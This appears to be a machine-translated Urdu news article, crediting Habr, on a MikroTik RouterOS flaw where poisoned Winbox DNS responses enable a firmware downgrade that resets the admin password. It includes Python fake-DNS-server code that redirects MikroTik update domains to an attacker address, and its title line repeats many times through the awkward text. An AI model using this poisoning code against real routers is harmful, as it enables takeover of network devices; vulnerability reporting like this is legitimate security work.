RouterOS میں بیک پورٹ کی کمزوری سیکڑوں ہزاروں آلات کو خطرے میں ڈالتی ہے۔

RouterOS میں بیک پورٹ کی کمزوری سیکڑوں ہزاروں آلات کو خطرے میں ڈالتی ہے۔

RouterOS (Mikrotik) پر مبنی آلات کو دور سے ڈاؤن گریڈ کرنے کی صلاحیت لاکھوں نیٹ ورک ڈیوائسز کو خطرے میں ڈال دیتی ہے۔ کمزوری کا تعلق ون باکس پروٹوکول کے DNS کیشے کو زہر دینے سے ہے اور آپ کو پرانے (پہلے سے طے شدہ پاس ورڈ ری سیٹ کے ساتھ) یا ترمیم شدہ فرم ویئر کو ڈیوائس پر لوڈ کرنے کی اجازت دیتا ہے۔

RouterOS میں بیک پورٹ کی کمزوری سیکڑوں ہزاروں آلات کو خطرے میں ڈالتی ہے۔

خطرے کی تفصیلات

RouterOS ٹرمینل DNS تلاش کے لیے حل کمانڈ کو سپورٹ کرتا ہے۔

RouterOS میں بیک پورٹ کی کمزوری سیکڑوں ہزاروں آلات کو خطرے میں ڈالتی ہے۔

اس درخواست کو حل کرنے والے بائنری کے ذریعہ سنبھالا جاتا ہے۔ Resolver بہت سی بائنریز میں سے ایک ہے جو RouterOS کے Winbox پروٹوکول سے جڑتی ہے۔ اعلیٰ سطح پر، ون باکس پورٹ پر بھیجے گئے "پیغامات" کو RouterOS میں ایک سرنی پر مبنی نمبرنگ اسکیم کی بنیاد پر مختلف بائنریز تک پہنچایا جا سکتا ہے۔

پہلے سے طے شدہ طور پر، RouterOS میں DNS سرور کی خصوصیت غیر فعال ہے۔

RouterOS میں بیک پورٹ کی کمزوری سیکڑوں ہزاروں آلات کو خطرے میں ڈالتی ہے۔

تاہم، سرور کا فنکشن غیر فعال ہونے پر بھی، راؤٹر اپنا DNS کیش برقرار رکھتا ہے۔

RouterOS میں بیک پورٹ کی کمزوری سیکڑوں ہزاروں آلات کو خطرے میں ڈالتی ہے۔

جب ہم winbox_dns_request مثال کے طور پر example.com کا استعمال کرتے ہوئے درخواست کرتے ہیں، تو راؤٹر نتیجہ کو کیش کر دے گا۔

RouterOS میں بیک پورٹ کی کمزوری سیکڑوں ہزاروں آلات کو خطرے میں ڈالتی ہے۔

چونکہ ہم DNS سرور کی وضاحت کر سکتے ہیں جس کے ذریعے درخواست کو جانا چاہئے، غلط پتے درج کرنا معمولی بات ہے۔ مثال کے طور پر، آپ ڈی این ایس سرور کے نفاذ کو ترتیب دے سکتے ہیں۔ فلپ کلاؤسہمیشہ ایک ریکارڈ کے ساتھ جواب دینا جس میں IP ایڈریس 192.168.88.250 ہے۔

def dns_response(data):
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
    print("---- Reply:n", reply)
    return reply.pack()

اب اگر آپ Winbox کا استعمال کرتے ہوئے example.com کو تلاش کرتے ہیں، تو آپ دیکھ سکتے ہیں کہ راؤٹر کا DNS کیش زہر آلود ہے۔

RouterOS میں بیک پورٹ کی کمزوری سیکڑوں ہزاروں آلات کو خطرے میں ڈالتی ہے۔

بلاشبہ، مثال ڈاٹ کام کو زہر دینا زیادہ مفید نہیں ہے کیونکہ راؤٹر اصل میں اسے استعمال نہیں کرے گا۔ تاہم، راؤٹر کو upgrade.mikrotik.com، cloud.mikrotik.com، cloud2.mikrotik.com اور download.mikrotik.com تک رسائی کی ضرورت ہے۔ اور ایک اور غلطی کی بدولت ان سب کو ایک ساتھ زہر دینا ممکن ہے۔

def dns_response(data):
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
    reply.add_answer(RR("upgrade.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud2.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("download.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    print("---- Reply:n", reply)
    return reply.pack()

روٹر ایک اجازت کی درخواست کرتا ہے، اور ہم پانچ واپس دیتے ہیں۔ روٹر ان تمام جوابات کو صحیح طریقے سے کیش نہیں کرتا ہے۔

RouterOS میں بیک پورٹ کی کمزوری سیکڑوں ہزاروں آلات کو خطرے میں ڈالتی ہے۔

ظاہر ہے، یہ حملہ اس صورت میں بھی مفید ہے جب راؤٹر DNS سرور کے طور پر کام کر رہا ہو، کیونکہ یہ راؤٹر کے کلائنٹس پر حملہ کرنے کی اجازت دیتا ہے۔

یہ حملہ آپ کو زیادہ سنگین خطرے سے فائدہ اٹھانے کی بھی اجازت دیتا ہے: RouterOS کے ورژن کو ڈاؤن گریڈ یا بیک پورٹ کریں۔ حملہ آور اپ ڈیٹ سرور کی منطق کو دوبارہ بناتا ہے، بشمول چینج لاگ، اور RouterOS کو پرانے (کمزور) ورژن کو موجودہ کے طور پر سمجھنے پر مجبور کرتا ہے۔ یہاں خطرہ اس حقیقت میں مضمر ہے کہ جب ورژن "اپ ڈیٹ" ہو جاتا ہے تو ایڈمنسٹریٹر کا پاس ورڈ ڈیفالٹ ویلیو پر ری سیٹ ہو جاتا ہے - حملہ آور خالی پاس ورڈ کے ساتھ سسٹم میں لاگ ان ہو سکتا ہے!


اس حقیقت کے باوجود حملہ کافی کام کر رہا ہے۔ مصنف کئی اور ویکٹر کو لاگو کرتا ہے، بشمول ان سے متعلق فرم ویئر میں پچھلے دروازے کو سرایت کرنالیکن یہ پہلے سے ہی ایک بے کار تکنیک ہے اور ناجائز مقاصد کے لیے اس کا استعمال غیر قانونی ہے۔

تحفظ

صرف Winbox کو غیر فعال کرنے سے آپ خود کو ان حملوں سے محفوظ رکھ سکتے ہیں۔ Winbox کے ذریعے انتظامیہ کی سہولت کے باوجود، SSH پروٹوکول کا استعمال کرنا بہتر ہے۔

ماخذ: www.habr.com

نیا تبصرہ شامل کریں